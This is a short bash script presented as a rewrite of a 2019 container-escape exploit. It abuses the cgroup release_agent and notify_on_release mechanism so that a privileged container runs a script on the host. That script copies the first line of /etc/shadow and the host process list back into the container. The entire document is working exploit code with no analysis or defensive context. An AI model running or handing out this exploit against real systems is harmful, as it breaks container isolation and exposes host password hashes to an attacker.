#!/bin/bash
# This is a re-write of Felix Wilhelms exploit from 2019.
# The original Tweet (and code) can be found at:
# https://twitter.com/_fel1x/status/1151487051986087936
rdma=/sys/fs/cgroup/rdma
mkdir -p $rdma/w
echo 1 >$rdma/w/notify_on_release
upperdir=`sed -rn 's/.*upperdir=([^,]*).*/\1/p' /etc/mtab`
echo $upperdir/cmd > $rdma/release_agent
echo '#!/bin/sh' > /cmd;
echo "head -n 1 /etc/shadow > $upperdir/utdata" >> /cmd
echo "ps >> $upperdir/utdata" >> /cmd
chmod +x /cmd
/bin/bash -c "echo 0 > $rdma/w/cgroup.procs"
sleep 3
cat /utdata